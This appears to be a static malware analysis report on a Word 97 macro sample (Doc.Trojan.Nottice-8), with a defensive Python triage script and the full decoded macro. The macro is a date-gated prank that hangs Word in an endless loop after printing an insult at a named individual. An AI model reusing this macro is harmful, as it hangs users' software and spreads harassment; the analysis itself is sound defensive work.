Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0bb907865692ac32…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 1.17 MB
Created: 2001-07-20 07:18:00
Authoring application: Microsoft Word 8.0 (Word 97)
First seen: 2015-09-18
MD5: 133d5974684013a41438ad6e5d80df70
SHA-1: eb550747735c1a6bf98092778d7c1abcb8c838b8
SHA-256: 0bb907865692ac32f29d22d68b673465f63b1e162a39049181c70753d26bb745
Risk score: 80

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is an OLE (Word 97 binary) document containing VBA macros. ClamAV matches the known signature Doc.Trojan.Nottice-8; this is a signature hit, not a heuristic. The macro module WININIT is a Word 6/95 WordBasic macro converted to VBA: the entry point is Sub MAIN and every call goes through the WordBasic compatibility object. Its behaviour is date-gated: only when the system date is 13 December does it open a new document, switch to full-screen maximised view, insert a large bold "IMPORTAT NOTTICE!" banner (the misspelling gives the signature its name) followed by a second line aimed at a named individual, and then spin in an unconditional GoTo loop (HangOn: / GoTo HangOn) that hangs Word until the process is killed. On any other date the procedure returns without doing anything. This is a time-bomb prank/denial-of-service payload rather than a dropper: the extracted code contains no Shell, CreateObject, file-write, MacroCopy or network calls, so static analysis yields no network or file-drop indicators. Static analysis cannot observe runtime activity; confirming the hang requires a sandbox run with the clock set to 13 December. The module name WININIT is not an auto-execute macro name (AutoOpen, AutoExec, AutoNew, AutoClose), so the trigger that runs it is not evident from the extracted code alone.
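The triage below is an added example, not part of this report's pipeline or of oletools: a pure-regex pass over decoded VBA/WordBasic source that flags the three things that matter for this sample (a date gate on Now(), a label immediately followed by GoTo to itself, and the absence of file/network/process calls) and tells the analyst which sandbox date would fire the gate. The sample text is an abbreviated, constructed copy of the macro shown on this page; the auto-execute name list and the conjunction assumption in gate_fires are assumptions, not something the page states.

```python
"""Static triage of a decoded VBA/WordBasic macro (added example).

Flags date-gated execution, self-referencing GoTo loops, auto-execute
entry points and file/network/process indicators. Pure regex, no oletools.
"""
import datetime
import re
from typing import Dict, List, Tuple

# Constructed test input: abbreviated copy of the WININIT macro on this page.
SAMPLE_VBA = '''Attribute VB_Name = "WININIT"

Public Sub MAIN()
If WordBasic.Day(WordBasic.Now()) = 13 And WordBasic.Month(WordBasic.Now()) = 12 Then
    WordBasic.FileNew
    WordBasic.Insert "IMPORTAT NOTTICE!"
HangOn:
GoTo HangOn
End If
End Sub

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
'''

# Word 6/95 macros converted by Word 97 become one module per macro, each with
# Public Sub MAIN(); the module name is the original macro name, so the
# auto-execute check looks at module names. List is an assumption (common names).
AUTO_EXEC_NAMES = {"autoexec", "autoopen", "autoclose", "autonew", "autoexit",
                   "document_open", "document_close", "document_new"}

# A date component of Now() compared against a literal: a time bomb gate.
DATE_GATE = re.compile(
    r"\b(?:WordBasic\.)?(Day|Month|Year|Weekday)\s*\(\s*(?:WordBasic\.)?Now\s*"
    r"(?:\(\s*\))?\s*\)\s*=\s*(\d+)", re.IGNORECASE)
MODULE_NAME = re.compile(r'^Attribute\s+VB_Name\s*=\s*"([^"]+)"',
                         re.IGNORECASE | re.MULTILINE)
LABEL = re.compile(r"^\s*([A-Za-z_]\w*):\s*$")
GOTO = re.compile(r"^\s*GoTo\s+([A-Za-z_]\w*)\s*$", re.IGNORECASE)
# Calls that would indicate dropping files, replicating or reaching out;
# their absence is what supports "no file drops / no network" in a static report.
IO_INDICATORS = re.compile(
    r"\b(Shell|CreateObject|GetObject|URLDownloadToFile|MacroCopy|Kill|FileCopy|"
    r"MkDir|Open\s+\S.*?\s+For\s+(?:Output|Binary|Append|Random))\b", re.IGNORECASE)


def modules(src: str) -> List[str]:
    return MODULE_NAME.findall(src)


def auto_exec_modules(src: str) -> List[str]:
    return [m for m in modules(src) if m.lower() in AUTO_EXEC_NAMES]


def date_gates(src: str) -> List[Tuple[str, int]]:
    """Every (component, literal) comparison against Now(), in source order."""
    return [(m.group(1).capitalize(), int(m.group(2))) for m in DATE_GATE.finditer(src)]


def self_loops(src: str) -> List[str]:
    """Labels whose next non-blank, non-comment line is GoTo to that same label."""
    lines = [l for l in src.splitlines() if l.strip() and not l.strip().startswith("'")]
    found = []
    for cur, nxt in zip(lines, lines[1:]):
        m_label, m_goto = LABEL.match(cur), GOTO.match(nxt)
        if m_label and m_goto and m_label.group(1).lower() == m_goto.group(1).lower():
            found.append(m_label.group(1))
    return found


def io_indicators(src: str) -> List[str]:
    return sorted({m.group(1) for m in IO_INDICATORS.finditer(src)})


def gate_fires(gates: List[Tuple[str, int]], year: int, month: int, day: int) -> bool:
    """Would the gate pass on this date? Assumes the comparisons are ANDed together
    (true for the sample); WordBasic Weekday is 1=Sunday .. 7=Saturday."""
    when = datetime.date(year, month, day)
    current = {"Day": when.day, "Month": when.month, "Year": when.year,
               "Weekday": (when.weekday() + 2) % 7 or 7}
    return bool(gates) and all(current[field] == value for field, value in gates)


def triage(src: str) -> Dict[str, object]:
    report: Dict[str, object] = {
        "modules": modules(src),
        "auto_exec_modules": auto_exec_modules(src),
        "wordbasic_compat": bool(re.search(r"\bWordBasic\.", src)),
        "date_gates": date_gates(src),
        "self_loops": self_loops(src),
        "io_indicators": io_indicators(src),
    }
    if report["io_indicators"]:
        report["verdict"] = "dropper/loader candidate"
    elif report["date_gates"] and report["self_loops"]:
        report["verdict"] = "date-gated hang (no drop/network indicators)"
    else:
        report["verdict"] = "manual review"
    return report


if __name__ == "__main__":
    r = triage(SAMPLE_VBA)
    for k, v in r.items():
        print(f"{k}: {v}")
    print("fires on 2015-12-13:", gate_fires(r["date_gates"], 2015, 12, 13))
```

For this sample the output lists the two gate comparisons (Day = 13, Month = 12), the HangOn self-loop, no auto-execute module name and no I/O indicators, which is exactly the evidence behind the verdict above; gate_fires is the quick way to pick the sandbox clock before a dynamic run.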

Heuristics (1)

  • VBA macros detected (severity: medium, rule OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind       Source                                               Size
macros.bas  vba-macro  oletools.olevba.extract_macros (decoded VBA source)  925 bytes
SHA-256: 01800a49a67327b149761aa7a0bf093e46f9cd4f680afe687aad2a56511df201
Detection
ClamAV: Doc.Trojan.Nottice-8
Obfuscation or payload: unlikely
Script preview
First 1,000 lines of the extracted script (this script is shorter, so it is shown in full)
Attribute VB_Name = "WININIT"

Public Sub MAIN()
If WordBasic.Day(WordBasic.Now()) = 13 And WordBasic.Month(WordBasic.Now()) = 12 Then
    WordBasic.FileNew
    WordBasic.ToggleFull
    WordBasic.DocMaximize
    WordBasic.Font "Imprint MT Shadow"
    WordBasic.FontSize 60
    WordBasic.Bold
    WordBasic.Insert "IMPORTAT NOTTICE!"
    WordBasic.StartOfLine
    WordBasic.CharRight 1, 1
    WordBasic.FormatFont Points:="48", Color:=6
    WordBasic.EndOfLine
    WordBasic.InsertPara
    WordBasic.InsertPara
    WordBasic.FontSize 48
    WordBasic.Insert "HANSSI A. A. IS MARRIED WITH A LOSSER."
HangOn:
GoTo HangOn
End If
End Sub

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True